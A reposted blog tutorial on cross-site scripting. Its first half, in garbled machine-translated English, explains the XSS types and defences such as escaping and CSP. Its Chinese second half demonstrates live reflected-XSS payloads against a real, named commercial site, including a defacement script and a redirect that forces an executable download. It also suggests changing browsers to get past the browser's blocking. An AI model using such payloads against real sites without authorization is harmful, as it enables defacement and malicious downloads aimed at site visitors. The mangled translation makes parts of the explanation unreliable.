[Reserved] common XSS Web attacks and combat explain the attack

Others 2019-12-19 16:34:38 views: null

1 What is XSS?

XSS (Cross-Site Scripting, also known as cross-site scripting attacks) is a code injection attack, the attacker by injecting malicious script on the destination site, make it run on the user's browser. With these malicious scripts, an attacker could host a higher authority, the user can obtain sensitive information, such as cookie, sessionID, etc., and thus endanger data security.

1.1 According to the source of attack, XSS attacks can be divided into three categories:

1. storage-type XSS

  • Attack steps: the attacker malicious code will be submitted to the database target site, the user opens the site is, the site server malicious code is removed from the database, the splicing back to the browser in HTML and then parse the user's browser to perform after receipt of the response incorporated therein malicious code, malicious code to steal user data and sent to the attacker's Web site, or posing as user behavior, call the target site interface to the execution of arbitrary action.
  • Common features to the site with the user to save data, such as forum posting, product reviews, user private letter, and so on.

2. reflective XSS

  • Attack steps: an attacker to construct a special URL, which contains malicious code. When a user opens a URL with malicious code, the site server malicious code is removed from the URL, the splice in HTML back to the browser, then the user's browser receives the response and performs parsing incorporated therein malicious code, malicious code to steal the user data sent to the attacker's Web site, or posing as user behavior, call the target site interface to the execution of arbitrary action.
  • Common in function to pass parameters through the URL, such as site search, jump and so on. Since the initiative requires the user to open a malicious URL to take effect, the attacker will often combine various means to induce users to click.
  • Reflective XSS difference with the storage type XSS is: storage type XSS malicious code exists in the database, reflective XSS malicious code exists in the URL.

3. DOM XSS type

  • Step attack: the attacker constructed special URL, which contains the malicious code, a user opens a URL, the user's browser to open the URL with malicious code with malicious code, after the user's browser receives the response analyzes and executes the tip JS removed URL malicious code and execute malicious code to steal user data and sent to the attacker's Web site, or posing as user behavior, call the target site interface to the execution of arbitrary action.
  • DOM XSS type XSS in front of two kinds of differences: DOM XSS type attacks, and remove malicious code execution done by the browser, JavaScript front-end part of their own security vulnerabilities, while the other two belong to the server XSS security vulnerabilities.

2 prevent XSS attacks

Prevent implantation in the HTML; JavaScript execution prevent execution of malicious code.

1. Prevention and reflective storage XSS attacks:

  • Into the front end of pure rendering, the code and data are separated.
  • To make full HTML escaped.

2. Prevention DOM XSS attack type:

  • When using .innerHTML, .outerHTML, document.write () to be especially careful not to put untrusted data as HTML into the page, but should make full use .textContent, .setAttribute () and so on.
  • If Vue / React stack technology, and without the use of v-html / dangerouslySetInnerHTML function, to avoid innerHTML, outerHTML render the front end of XSS hidden stage.

3. Other XSS attack prevention:

  • Content Security Policy(CSP)
  • Enter the content length control, increasing the difficulty of XSS attacks.
  • HTTP-only Cookie: Prohibition JavaScript to read some sensitive Cookie, after the completion of the attacker inject XSS can not steal this Cookie.
  • Code: prevent user submitted script posing dangerous operation.

3 actual process

2.1 Finding sites with XSS vulnerabilities

Find a site with a search box here, pencarian Indonesian is "Search" means

 

2.2 Test one by one looking for attack sites

We first take a test site, the search box to enter <h1> TEST </ h1>, if the attack may display the following page

On behalf of the server does not filter the parameters directly into the fight html, further confirmed the right mouse button to view the page source code

Display <h1> TEST> </ h1> represents the server without the filtering operation

接着,返回,搜索框输入<script>alert('x');</script>,如果可攻击,出现如下网页

 

 

2.3 url注入代码执行脚本(实践一)

更改url为

https://www.sankelux.co.id/search?keyword=<script>document.body.innerHTML="<div style:visibility:visible;><h1>THE SITE WAS HACKED</h1></div>"</script>
复制代码

也就是将keyword参数写成了一段脚本代码,执行效果如下

2.4 url注入代码执行脚本(实践二)

更改url为

https://www.sankelux.co.id/search?keyword=<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>
复制代码

执行效果会自动下载putty.exe文件。

可以将keyword更换成任意你想执行的脚本

2.5 可能遇到的问题

浏览器拦截,出现如下情况,更换浏览器即可

 

 



Guess you like

Origin www.cnblogs.com/chaos-li/p/12068361.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com